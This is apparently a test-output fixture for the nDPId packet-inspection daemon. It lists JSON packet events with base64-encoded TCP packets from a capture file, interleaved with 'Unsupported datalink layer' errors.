-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":377,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHlQABABoD4wKi0ArL40DbC2QBQ64tGkd7ryXewEBs7NfIAAAEBCAoANYlMRwYNRQEBBQre69m73uvkkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":378,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803853} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":378,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHmQABABoD3wKi0ArL40DbC2QBQ64tGkd7rzuOwEBtoMDkAAAEBCAoANYlVRwYNXAEBBQre69m73uvkkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":379,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803856} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":379,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHnQABABoD2wKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVKqAAAAEBCAoANYlVRwYNXAEBBQre69m73uvkkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":380,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803902} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":380,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHoQABABoD1wKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVJS8AAAEBCAoANYlaRwYNXAEBBQre69m73uvp\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":381,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803910} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":381,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHpQABABoD0wKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVH8MAAAEBCAoANYlaRwYNXAEBBQre69m73uvvaw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":382,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803963} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":382,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHqQABABoDzwKi0ArL40DbC2QBQ64tGkd7r1E+wEBuVGlEAAAEBCAoANYlgRwYNXAEBBQre69m73uv01w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":383,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804019} -00350{"packet_event_id":1,"packet_event_name":"packet","packet_id":383,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHrQABABoDqwKi0ArL40DbC2QBQ64tGkd7r1E\/QEBuVQm8AAAEBCAoANYlmRwYNXAEBBRLe6\/pD3uv\/r97r2bve6\/TX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":384,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804085} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":384,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHsQABABoDpwKi0ArL40DbC2QBQ64tGkd7r1E\/QEBuVPP0AAAEBCAoANYlsRwYNXAEBBRLe6\/pD3uwFG97r2bve6\/TX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":385,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804142} 
-00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":385,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHtQABABoDowKi0ArL40DbC2QBQ64tGkd7r1E\/QEBuVN4sAAAEBCAoANYlyRwYNXAEBBRLe6\/pD3uwKh97r2bve6\/TX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":386,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652804187} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":386,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHuQABABoDvwKi0ArL40DbC2QBQ64tGkd7r9NewEBvDwvMAAAEBCAoANYl2RwYNtQEBBQre6\/pD3uwKhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":387,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805160} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":387,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHvQABABoD6wKi0ArL40DbC2QBQ64tGkd7sCoeAEBvwpJEAAAEBCAoANYnYRwYOkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":388,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805221} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":388,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHwQABABoDtwKi0ArL40DbC2QBQ64tGkd7sCoewEBvwi0gAAAEBCAoANYneRwYOkwEBBQre7A\/z3uwVXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":389,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805221} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":389,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHxQABABoDswKi0ArL40DbC2QBQ64tGkd7sCoewEBvwhdwAAAEBCAoANYneRwYOkwEBBQre7A\/z3uwayw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":390,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805298} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":390,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHyQABABoDjwKi0ArL40DbC2QBQ64tGkd7sCofQEBvwd8AAAAEBCAoANYnmRwYOkwEBBRLe7BVf3uway97sD\/Pe7BrL"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":391,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805675} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":391,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHzQABABoD2wKi0ArL40DbC2QBQ64tGkd7sGsuAEBwdk3MAAAEBCAoANYoMRwYPDA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":392,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805741} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH0QABABoD1wKi0ArL40DbC2QBQ64tGkd7sIDeAEBxKjaUAAAEBCAoANYoSRwYPOw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":393,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805742} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":393,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH1QABABoD0wKi0ArL40DbC2QBQ64tGkd7sJaOAEBx4iAsAAAEBCAoANYoSRwYPOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":394,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805799} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":394,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH2QABABoDzwKi0ArL40DbC2QBQ64tGkd7sKw+AEBylgl4AAAEBCAoANYoYRwYPSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":395,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805800} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":395,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH3QABABoDywKi0ArL40DbC2QBQ64tGkd7sMHuAEBzSfMUAAAEBCAoANYoYRwYPSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":396,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805801} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":396,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH4QABABoDxwKi0ArL40DbC2QBQ64tGkd7sNeeAEBz\/dywAAAEBCAoANYoYRwYPSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":397,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805827} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":397,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH5QABABoDwwKi0ArL40DbC2QBQ64tGkd7sO1OAEB0tcYEAAAEBCAoANYobRwYPVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":398,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805828} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":398,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH6QABABoDvwKi0ArL40DbC2QBQ64tGkd7sQL+AEB1aa+gAAAEBCAoANYobRwYPVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":399,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805834} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":399,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH7QABABoDuwKi0ArL40DbC2QBQ64tGkd7sRiuAEB2HZk4AAAEBCAoANYobRwYPWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":400,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":400,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH8QABABoDtwKi0ArL40DbC2QBQ64tGkd7sS5eAEB20YKwAAAEBCAoANYoeRwYPXg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":401,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805857} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":401,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH9QABABoDswKi0ArL40DbC2QBQ64tGkd7sUQOAEB3iWxIAAAEBCAoANYoeRwYPXg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":402,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805922} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":402,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH+QABABoDrwKi0ArL40DbC2QBQ64tGkd7sVm+AEB4PVW4AAAEBCAoANYokRwYPYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":403,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805926} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":403,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMH\/QABABoDqwKi0ArL40DbC2QBQ64tGkd7sW9uAEB48T9UAAAEBCAoANYokRwYPYw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":404,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652805935} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":404,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIAQABABoDdwKi0ArL40DbC2QBQ64tGkd7sW9uwEB48k+gAAAEBCAoANYolRwYPYwEBBQre7GFH3uxmsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":405,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806011} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":405,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIBQABABoDUwKi0ArL40DbC2QBQ64tGkd7sW9vQEB48zXMAAAEBCAoANYotRwYPYwEBBRLe7HGL3ux2997sYUfe7Gaz"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":406,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806090} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":406,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMICQABABoDbwKi0ArL40DbC2QBQ64tGkd7sZrOwEB5paCIAAAEBCAoANYo1RwYPjAEBBQre7HGL3ux29w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":407,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806492} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":407,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIDQABABoDawKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XYgoAAAEBCAoANYpdRwYP4gEBBQre7HGL3ux29w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":408,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806560} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":408,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIEQABABoDZwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XXJcAAAEBCAoANYpkRwYP4gEBBQre7HGL3ux8Yw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":409,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806561} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":409,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIFQABABoDYwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XVysAAAEBCAoANYpkRwYP4gEBBQre7HGL3uyBzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":410,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806628} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":410,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIGQABABoDPwKi0ArL40DbC2QBQ64tGkd7sbB\/QEB6XewcAAAEBCAoANYprRwYP4gEBBRLe7Hxj3uyBz97scYve7IHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":411,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806630} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":411,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIHQABABoDWwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XUbgAAAEBCAoANYprRwYP4gEBBQre7HGL3uyHOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":412,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806633} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":412,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIIQABABoDVwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XTEwAAAEBCAoANYprRwYP4gEBBQre7HGL3uyMpw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":413,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806685} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":413,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIJQABABoDUwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XRtsAAAEBCAoANYpwRwYP4gEBBQre7HGL3uySEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":414,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806695} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":414,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIKQABABoDTwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XQW0AAAEBCAoANYpyRwYP4gEBBQre7HGL3uyXfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":415,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806720} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":415,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMILQABABoDSwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XO\/8AAAEBCAoANYp0RwYP4gEBBQre7HGL3uyc6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":416,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806726} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":416,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIMQABABoDRwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XNpIAAAEBCAoANYp1RwYP4gEBBQre7HGL3uyiVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":417,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806748} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":417,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMINQABABoDQwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XMSQAAAEBCAoANYp3RwYP4gEBBQre7HGL3uynww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":418,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806757} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":418,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIOQABABoDPwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XK7cAAAEBCAoANYp4RwYP4gEBBQre7HGL3uytLw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":419,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806776} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":419,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIPQABABoDOwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XJkkAAAEBCAoANYp6RwYP4gEBBQre7HGL3uyymw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":420,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806782} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":420,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIQQABABoDNwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XIN0AAAEBCAoANYp6RwYP4gEBBQre7HGL3uy4Bw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":421,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806851} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":421,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIRQABABoDMwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XG2oAAAEBCAoANYqBRwYP4gEBBQre7HGL3uy9cw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":422,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806851} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":422,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMISQABABoDLwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XFf4AAAEBCAoANYqBRwYP4gEBBQre7HGL3uzC3w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":423,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":423,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMITQABABoDWwKi0ArL40DbC2QBQ64tGkd7swt+AEB7E5vQAAAEBCAoANYqCRwYQWQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":424,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806938} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":424,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIUQABABoDVwKi0ArL40DbC2QBQ64tGkd7syEuAEB7x4UsAAAEBCAoANYqKRwYQYQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
